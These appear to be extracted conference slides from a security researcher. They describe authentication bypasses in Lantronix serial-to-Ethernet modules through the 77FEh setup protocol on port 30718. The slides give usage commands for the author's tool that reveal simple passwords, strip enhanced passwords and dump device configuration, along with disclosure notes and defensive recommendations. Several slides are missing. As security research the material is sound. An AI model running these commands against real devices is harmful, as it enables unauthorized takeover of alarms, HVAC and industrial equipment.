2. 2
Mos
Eisley
Lab
Who are you!?!!??
●
Security Jedi at Diverto
–
Bringing balance to the force
●
Experience
–
Offensive (Penetration tester)
–
Defensive (Developer/System Administrator/...)
–
Have code in: Nmap, Metasploit, OpenVAS, …
–
Author of free software: https://github.com/kost/
●
If you trust in certificates
–
CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
5. 5
Mos
Eisley
Lab
You can find them as integral part
of
●
Alarms
●
HVACs
●
Pool monitoring systems
●
Sprinkler controllers
●
Hacked vacuum cleaners - Roombas
●
Embedded systems
●
Industrial systems
Source:
http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsA
6. 6
Mos
Eisley
Lab
What they are running actually?
●
OS
–
CoBos (mostly)
–
Evolution OS/Linux
–
ThreadX
–
Linux
●
Support
–
1 or more serial ports
–
Modbus (few models)
–
10/100 Ethernet
9. 9
Mos
Eisley
Lab
Most frequent services Available –
TCP/IP
●
Web (tcp/80)
●
Telnet (tcp/9999)
●
77FEh (tcp-udp/30718)
●
SNMP (udp/161)
Telnet administration interface
What is this?
Mostly information disclosures
Simple web server
Serving applet JAR which talks
to 30718 port
10. 10
Mos
Eisley
Lab
Device Discovery
●
Ask :)
●
Look if you have physical access
●
Passive
●
Active/Scanning
–
Standard port scanning is fine with conservative timing
–
Broadcast UDP to specific Lantronix ports (30718)
●
Beware
–
Version scanning(-sV) or running vulnerability scanners
may misconfigure device
–
11. 11
Mos
Eisley
Lab
Telnet administration
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Password :
12. 12
Mos
Eisley
Lab
So, WTF is 77FEh finally?
●
0x77FE = 30718 (10)
●
TCP/UDP protocol for device setup
–
Proprietary protocol
–
Used by DeviceInstaller (proprietary software from
Lantronix)
●
Designed for
–
Setup of device
–
Administration of device
–
Getting device info
–
Insecurity (sorry, had to write it, you'll see later ;) )
13. 13
Mos
Eisley
Lab
Sample 77FEh communication
[v] Sending 4 bytes:
0x00000000 (00000) 000000f6 ....
[v] Received 30 bytes:
(00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....
(00016) 62a7d944 00000000 00204a91 84fb b..D..... J...
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip>
Query setup request (4)
Query setup response (4) MAC address
of the device (6)
Device type
15. 15
Mos
Eisley
Lab
Previous – work
●
Metasploit
–
Rob Vinson
●
http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne
●
https://github.com/robvinson/metasploit-modules
–
Metasploit modules for simple passwords by jgor
●
http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant
●
http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant
●
Tools
–
Simple C program by jgor
●
https://github.com/jgor/lantronix-telnet-pw
16. 16
Mos
Eisley
Lab
But...
●
Simple password is not set
●
Device still asks for password
●
Further digging
–
Enhanced password in place
–
You cannot get/reset the enhanced password
easily
–
Length is bigger (4->16)
–
Challenge!!!
17. 17
Mos
Eisley
Lab
Introduction to enhanced passwords
Source: Lantronix documentation
Feature/Type Simple Password Enhanced
Password
Length 4 16
Visible in query
setup
yes no
23. 23
Mos
Eisley
Lab
Enhanced password gone
no password to enter!
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Press Enter for Setup Mode
25. 25
Mos
Eisley
Lab
New tool: lantronix-witchcraft
●
77FEh protocol implementation
●
77FEh security related utility
●
All the tricks mentioned implemented
●
Free software: GPL2
●
Requirement: Perl
●
Available at
–
https://github.com/kost/lantronix-witchcraft
26. 26
Mos
Eisley
Lab
Basic usage:
●
Display Mac address:
–
./lantronix-witchcraft.pl -Q <ip>
●
Display Simple Password (up to 4 characters)
–
./lantronix-witchcraft.pl -P <ip>
●
Reset Security record (together with enhanced password)
–
./lantronix-witchcraft.pl -E <ip>
●
Reset Security record without AES (with enhanced
password)
–
./lantronix-witchcraft.pl -S <ip>
●
Dump setup records
–
./lantronix-witchcraft.pl -G -D <ip>
27. 27
Mos
Eisley
Lab
Brave enough?
●
One command to rule them all
●
Display Mac address and simple password, dump setup
records, reset security records together with enhanced
password:
–
–
./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip>
●
29. 29
Mos
Eisley
Lab
Correct way
●
Ask
–
Someone responsible if they could have something like that
●
Send broadcast query packet to 77FEh
●
Identify ports 30718 open (TCP or UDP)
●
Dump setup records
●
Play ;)
●
Check if it is still working...
–
If yes, perfect
–
If not: huh, but you should restore setup records somehow ;)
30. 30
Mos
Eisley
Lab
It's not about Lantronix...
●
...they warned the vendors about it in their
documentation
Source: Lantronix documentation
31. 31
Mos
Eisley
Lab
Disclosure Problem
●
It's more about vendors who implement
Lantronix in their devices
●
Whom to report?
–
Lantronix – I guess they know their protocol ;)
–
OEMs – hard to find all their customers ;)
●
Awareness
–
Conference
–
Tools
33. 33
Mos
Eisley
Lab
Recommendations
●
Have some other device to VPN/SSL tunnel
the services
●
Telnet only through VPN or other secure
channel to administration interface
●
Disable 77FEh if not needed
●
Filter out 77FEh on network devices to only
allowed ones
●
Disable other unneccesary services (SNMP,
telnet, etc).
35. 35
Mos
Eisley
Lab
Summary
●
There are ways to pass beyond authentication (if 77FEh is enabled)
–
Simple passwords
–
Enhanced passwords
●
Tools
–
Metasploit Lantronix modules
–
https://github.com/kost/lantronix-witchcraft
●
Recommendations
–
Disable 77FEh if not needed or Filter out 77FEh on network devices to only
allowed ones
–
Tunnel VPN/SSL all communication to these devices
●
Future
–
There are things to research: way to obtain enhanced password or AES keys
for example
36. 36
Mos
Eisley
Lab
Acknowledgements - Thanks
●
Previous work (Simple Passwords)
–
Rob Vinson
●
http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne
●
https://github.com/robvinson/metasploit-modules
–
Metasploit modules for simple passwords by jgor
●
http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan
●
http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan
●
https://github.com/jgor/lantronix-telnet-pw
●
Colleagues
–
Dalibor Dosegović, hardware wizard